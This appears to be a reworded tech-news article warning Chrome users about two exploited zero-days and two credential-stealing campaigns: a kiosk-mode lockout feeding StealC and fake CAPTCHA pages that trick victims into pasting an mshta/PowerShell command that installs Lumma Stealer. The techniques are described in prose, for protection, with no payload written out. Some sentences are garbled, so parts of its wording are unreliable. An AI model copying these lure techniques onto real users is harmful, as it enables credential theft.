Updated on September 16 with a new CAPTCHA attack targeting Windows users.
The last few weeks have been quite busy for Chrome, with a lot of news for its 3 billion users. And so it would be very easy to forget that the update deadline is now only 72 hours away. Google has confirmed that attackers have actively exploited two dangerous vulnerabilities in Chrome, and users should not remain unprotected.
The first of these memory vulnerabilities was made public in a Chrome update on August 21, in which Google warned that CVE-2024-7971 was being actively exploited. What was worse was that a second memory vulnerability fixed in the same update—CVE-2024-7965—was also under attack. Google confirmed this a week later.
The US government's cybersecurity agency has added both threats to its Known Exploited Vulnerabilities (KEV), requiring all federal employees to update Chrome by September 16 (and September 18 for a second fix) or stop using their browser. And while CISA's deadlines are only mandatory for government employees, many organizations comply with its orders. To put it more simply – there are two actively exploited vulnerabilities, update Chrome now if you haven't done so since early September.
As CISA explains, it “maintains the authoritative source of vulnerabilities that have been exploited in the wild. Organizations should use the KEV Catalog as input to their vulnerability management prioritization framework.”
There have been two desktop Chrome updates since then, on September 2 and 10 respectively, both of which addressed high-severity vulnerabilities, though none of the vulnerabilities have yet been confirmed to have been actively exploited.
Somewhat ironically, given its own procession of zero-days, including this week’s Patch Tuesday, one of the critical Chrome vulnerabilities discovered and disclosed by Microsoft was an attack attributed to North Korean crypto hackers who linked the Chrome vulnerability to a Windows zero-day (now patched).
Microsoft suggested this as a reason for users to switch from Chrome to Edge, advising organizations to “encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.”
While I wouldn't recommend it, Microsoft's warning that Chrome phishing lures should be stopped at the source is important. And Google is taking its own steps to do just that. Google assured this week that its “redesigned Safety Check feature will now run automatically in the background on Chrome, taking more proactive steps to keep you safe. It will also notify you of actions it takes, including revoking permissions from sites you no longer visit, flagging potentially unwanted notifications, and more.”
Microsoft has just released its latest Microsoft Threat Intelligence podcast, which sheds light on the nature of the North Korean threat behind the disclosure of CVE-2024-7971. It also sheds some light on the “surprising nature of recent attack chains involving vulnerabilities in the Chromium engine.”
Chrome faces a lot of criticism – the downside of market dominance – but it deserves credit for its continued improvement; though you have to ignore the built-in advertising and cookie-driven data collection. It's making a difference, as a shocking exchange on X this week showed. Google's crackdown on information stealers exploiting Chrome's vulnerabilities is starting to close the stagnant door. However the exchange shows the other side is clearly intent on finding new ways around it.
While the latest worldwide browser market share data shows that Edge continues to build its user base, it's happening at an exceptionally slow pace; StatCounter reports a statistically inconsequential increase from 13.75% in July to 13.78% in August this year, although year-over-year growth is more encouraging, with Edge up from 11.15% a year ago.
Updating Chrome to the latest release will address the two exploited zero-days as well as everything that has been fixed since then. As always, check that the update is downloaded and then restart your browser to make sure it's installed. If you've switched to Edge, you need to do the same – the actively exploited threats affect both browsers.
Sometimes the most dangerous threats are in plain sight, and can strike even when you've done the right thing and updated. That's certainly the case with a new warning for Chrome users, along with a new attack that can frustrate you into doing something you know you shouldn't – which makes it even worse.
As raised Bleeping ComputerThis new attack – which was first disclosed by OALABS Research – is “a new technique used by thieves to force victims to enter credentials into the browser, which can then be stolen from the browser’s credential store using traditional thief malware.”
This opens the door for the StealC malware, whose campaign is specifically designed to steal Google account credentials, the researchers said. The attack works by forcing the browser into “kiosk mode” before navigating to the login page of the “targeted service, typically Google.” This kiosk mode is a full-screen web view, and the attack prevents exiting or even navigating away from full-screen.
“This tactic annoys the victim and forces them to enter their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser's credential store on disk and can be stolen using the Stealer malware, which is deployed with the credential flusher.”
As Bleeping Computer explains that, because the normal keys have been disabled, “try other hotkey combos such as 'Alt + F4', 'Ctrl + Shift + Esc', 'Ctrl + Alt +Delete', and 'Alt +Tab'.” If that doesn't work by returning focus to your desktop, “Pressing 'Win Key + R' should open the Windows Command Prompt. Type 'cmd' and then close Chrome with 'taskkill /IM chrome.exe /F'.” Or, failing that, hard reboot your PC.
There's also a second, more dangerous new threat for Chrome users that's now becoming apparent, though it's so simple that it should be pretty easy to spot. Hopefully, if it does attack your PC, you won't fall victim to it and will shut it down immediately.
This attack relies on the use of a fake CAPTCHA and was first flagged by Palo Alto Networks' Unit 42, but received little attention at the time. Now a video from researcher John Hammond is circulating on X, which will boost the rating.
As the researchers explain, “As recently as 2024-08-27, fake verification pages have been set up to distribute the Lumma Stealer malware. These pages contain a button that, when clicked, shows victims instructions to paste a PowerShell script into the Run window. This copy/paste PowerShell script retrieves and runs the Windows EXE for the Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use ZIP archives that do not appear to be inherently malicious in themselves.”
Lumma Stealer is an information-stealer that is often rented out as a dangerous malware-as-a-service game; it targets user credentials and crypto wallets. As you can see from the video (below), it doesn't look like an everyday captcha with requests for users to copy, paste and enter a script. Frankly, if alarm bells aren't ringing in your head at this point, you should probably shut down your PC and relax.
Hudson Rock's Infostealers website reported the same attack two weeks ago, but still it did not get the success it deserved. “Through the end of August 2024, attackers are using fraudulent 'human verification' pages to trick users into executing malicious PowerShell scripts,” the researchers warned.
The captcha is delivered through source code in the malicious website visited by the user. “This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard.”
That code triggers the mshta binary, “a legitimate Windows utility used to execute HTML applications (HTA) and handle embedded scripts… Since it is a binary trusted and signed by Microsoft, it often bypasses security filters, making it a prime candidate for exploitation in 'living off the land' attacks. This technique allows attackers to execute malicious scripts without raising an alarm, since mshta.exe will not typically be flagged by antivirus or endpoint security systems.”
If you haven't cut and run by this point, the malware will execute another command to download the Lumma Stealer payload, “which is designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines.”
Just like the Google login window running in full-screen kiosk mode, the intention here is to socially engineer an attack that hides behind familiarity, tricking users into trusting the Google login or website captcha verification box. CAPTCHA tests have become such an everyday part of using the web that we tend to overlook them. And where these were all once very similar, we now see much more variety than before as “are you human” challenges evolve.
And this situation is only going to get worse. CAPTCHA, also known as the “Completely Automated Public Turing test to tell Computers and Humans Apart,” will be one of many beneficiaries of the rapid integration of more advanced AI into everything we do online and the way we interact with our devices. Although this attack is crude and easy to detect, you can expect more sophisticated variations on this theme to emerge, especially as we all find our feet in this brave new world.
As PC Mag “Malicious CAPTCHA tests can easily be delivered to the target by sending phishing emails or messages. Users should therefore be careful if they receive any unusual requests from a CAPTCHA test; it could be a trap,” warns.
All this shows that you can do all the right things — including updating as soon as possible, and still have a socially engineered campaign coming for your data. If you to do If you find yourself suffering from this or a similar issue, be sure to run an updated antivirus scan on your PC before resuming use as normal.